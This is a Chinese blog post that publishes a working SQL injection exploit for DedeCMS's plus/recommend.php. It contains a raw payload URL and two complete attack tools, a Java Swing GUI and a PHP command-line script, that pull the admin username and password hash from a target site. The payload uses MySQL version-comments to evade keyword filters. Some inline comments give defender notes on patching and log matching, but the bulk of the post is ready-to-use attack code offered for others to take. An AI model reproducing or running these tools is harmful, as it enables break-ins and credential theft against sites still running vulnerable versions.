DedeCMS全版本通杀SQL注入漏洞利用代码及工具
DedeCMS即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms)以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。近日,网友在DedeCMS中发现了全版本通杀的SQL注入漏洞,当前官方最新版已修复该漏洞;受影响的入口为 plus/recommend.php,仍在使用旧版本的站点应尽快升级到官方最新版。有关利用代码如下:
EXP:
Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111
工具源码(by 园长):
package org.javaweb.dede.ui;
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
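/**
 * Single-window Swing front end for the DedeCMS {@code plus/recommend.php}
 * SQL injection described on this page.
 *
 * <p>The window holds a base-URL field, one button and a text area. Pressing the
 * button sends one HTTP GET to the site under test and prints the two values
 * parsed out of the response.
 *
 * <p>Reading notes for defenders: the request is a plain GET whose query string
 * carries {@code _FILES[type][...]} keys, i.e. upload metadata supplied as
 * ordinary request parameters, plus a UNION SELECT over the admin table. The
 * page states that the vendor's latest release fixes the flaw, so upgrading is
 * the remediation; access-log or WAF matching on {@code _FILES[} inside the
 * query string of {@code plus/recommend.php} is a practical detection.
 *
 * @author yz
 */
public class MainFrame extends javax.swing.JFrame {
    private static final long serialVersionUID = 1L;

    /**
     * Creates new form MainFrame
     */
    public MainFrame() {
        initComponents();
    }

    /**
     * Fetches {@code url} with a GET and returns the response body, every line
     * terminated by CRLF.
     *
     * <p>The body is decoded with the platform default charset. Any exception is
     * shown in the output area instead of being thrown, and whatever was read up
     * to that point is returned (an empty string if nothing was read).
     *
     * @param url absolute URL to fetch
     * @return the response text read so far, never {@code null}
     */
    public String request(String url) {
        // StringBuilder avoids re-copying the whole body for every line read.
        StringBuilder body = new StringBuilder();
        BufferedReader br = null;
        try {
            br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
            String line;
            while ((line = br.readLine()) != null) {
                body.append(line).append("\r\n");
            }
        } catch (Exception e) {
            jTextArea1.setText(e.toString());
        } finally {
            // The original never closed the stream, leaking one connection per click.
            if (br != null) {
                try {
                    br.close();
                } catch (java.io.IOException ignored) {
                    // Close failure is not actionable; the text already read is still returned.
                }
            }
        }
        return body.toString();
    }

    /**
     * Builds the window: URL label and field, the trigger button and a scrollable
     * output area. The GroupLayout section is NetBeans form-editor output and is
     * kept as generated.
     */
    private void initComponents() {
        jPanel1 = new javax.swing.JPanel();
        jLabel1 = new javax.swing.JLabel();
        jTextField1 = new javax.swing.JTextField();
        jButton1 = new javax.swing.JButton();
        jScrollPane1 = new javax.swing.JScrollPane();
        jTextArea1 = new javax.swing.JTextArea();
        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
        jLabel1.setText("URL:");
        jTextField1.setText("http://localhost");
        this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
        // Centre a 458x316 window on the screen; the screen size is queried once.
        java.awt.Dimension screen = Toolkit.getDefaultToolkit().getScreenSize();
        int screenWidth = screen.width;
        int screenHeight = screen.height;
        this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
        jButton1.setText("获取");
        jButton1.addActionListener(new java.awt.event.ActionListener() {
            @Override
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jButton1ActionPerformed(evt);
            }
        });
        jTextArea1.setColumns(20);
        jTextArea1.setRows(5);
        jScrollPane1.setViewportView(jTextArea1);
        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
        jPanel1.setLayout(jPanel1Layout);
        jPanel1Layout.setHorizontalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
                    .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
                    .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
                        .addContainerGap()
                        .addComponent(jLabel1)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
                .addGap(0, 0, Short.MAX_VALUE))
        );
        jPanel1Layout.setVerticalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addContainerGap()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(jLabel1)
                    .addComponent(jTextField1,
                        javax.swing.GroupLayout.PREFERRED_SIZE,
                        javax.swing.GroupLayout.DEFAULT_SIZE,
                        javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addComponent(jButton1))
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
        );
        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
        pack();
    }// </editor-fold>

    /**
     * Button handler: sends the single request and prints the parsed result.
     * Does nothing when the URL field is empty or when the response holds no
     * matching {@code <h2>} element.
     *
     * @param evt the click event (unused)
     */
    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
        String url = jTextField1.getText();
        if(null==url||"".equals(url)){
            return ;
        }
        // The query string below supplies _FILES[type][tmp_name|name|type|size] as
        // plain GET parameters and places a UNION SELECT in tmp_name that
        // concatenates userid and pwd from the admin table with 0x7c ('|') between
        // them. The union/select keywords sit inside MySQL version-conditional
        // comments, a form commonly used to slip past keyword filters.
        // Detection: upload metadata in a GET query string is never legitimate, so
        // "_FILES[" on a request line for plus/recommend.php is a usable log/WAF match.
        String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
        // The injected row is read back from the first <h2>...</h2> in the page.
        Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
        if(m.find()){
            String[] s = m.group(1).split("\\|");
            if(s.length>2){
                // s[1] is userid, s[2] is pwd; the first three characters and the last
                // one of pwd are dropped before display.
                // NOTE(review): presumably the stored value pads the digest - confirm
                // against the DedeCMS admin schema.
                jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
            }
        }
    }

    /**
     * Entry point: creates and shows the window on the AWT event dispatch thread.
     *
     * @param args ignored
     */
    public static void main(String args[]) {
        java.awt.EventQueue.invokeLater(new Runnable() {
            @Override
            public void run() {
                new MainFrame().setVisible(true);
            }
        });
    }

    // Variables declaration - do not modify
    private javax.swing.JButton jButton1;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JScrollPane jScrollPane1;
    private javax.swing.JTextArea jTextArea1;
    private javax.swing.JTextField jTextField1;
    // End of variables declaration
}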
拿园长的工具来改改,改成PHP版的,喜欢的拿去。。。
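<?php
/**
 * Created by 独自等待
 * Date: 14-3-3
 * Time: 12:58 PM
 * Name: dede_recommend.php
 * Author's blog: http://www.waitalone.cn/
 *
 * Command-line port of the Java tool for the DedeCMS plus/recommend.php SQL
 * injection. Usage: php dede_recommend.php host path
 *
 * It sends one GET to plus/recommend.php and prints the two values parsed from
 * the response.
 *
 * Reading notes for defenders: the query string carries _FILES[type][...] keys
 * (upload metadata supplied as ordinary request parameters) and a UNION SELECT
 * over userid/pwd of the admin table. The page states that the vendor's latest
 * release fixes the flaw; matching "_FILES[" in the query string of
 * plus/recommend.php in access logs or a WAF rule detects this request.
 */
print_r('
+------------------------------------------------------+
DedeCMS recommend.php 注入EXP
Site:http://www.waitalone.cn/
Exploit BY: 独自等待
Time:2014-03-03
+------------------------------------------------------+
');
// Both positional arguments (host and path) are required.
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of dedecms
Example: php ' . $argv[0] . ' localhost /dedecms
+------------------------------------------------------+
');
    exit;
}
// 7 = E_ERROR | E_WARNING | E_PARSE; notices are suppressed.
error_reporting(7);
// Start the timer before any work. The original set $start_time after the
// request had finished, so the reported run time was always close to zero.
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
$url = "http://$host/$path/plus/recommend.php";
echo '管理员密码获取中,请稍候……' . PHP_EOL;
// Reachability check only: succeeds when plus/recommend.php can be opened.
if (@fopen($url, 'r')) {
    // Same query as the Java tool: _FILES[type][...] passed as GET parameters,
    // with a UNION SELECT in tmp_name that joins userid and pwd using 0x7c ('|').
    $exp = "$url?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@%60\\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294";
    $info = @file_get_contents($exp);
    // Capture the two '|'-delimited fields that precede the closing </h2>.
    if (preg_match('/\|(.*?)\|(.*?)<\/h2>/', $info, $match)) {
        echo '========================================' . PHP_EOL;
        // Only 16 characters of the second field, starting at offset 3, are printed.
        echo '用户名:' . $match[1] . ' 密码:' . substr($match[2], 3, 16) . PHP_EOL;
        echo '========================================' . PHP_EOL;
    } else {
        echo '未知错误,请手工尝试!' . PHP_EOL;
    }
} else {
    echo '报告大爷,网站不存在此漏洞!' . PHP_EOL;
}

/**
 * Timing helper: returns the current Unix time in seconds, including the
 * microsecond fraction, as a float.
 */
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒';
?>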
效果如下:

参考网站:
http://0day5.com/archives/1349
http://p2j.cn/?p=798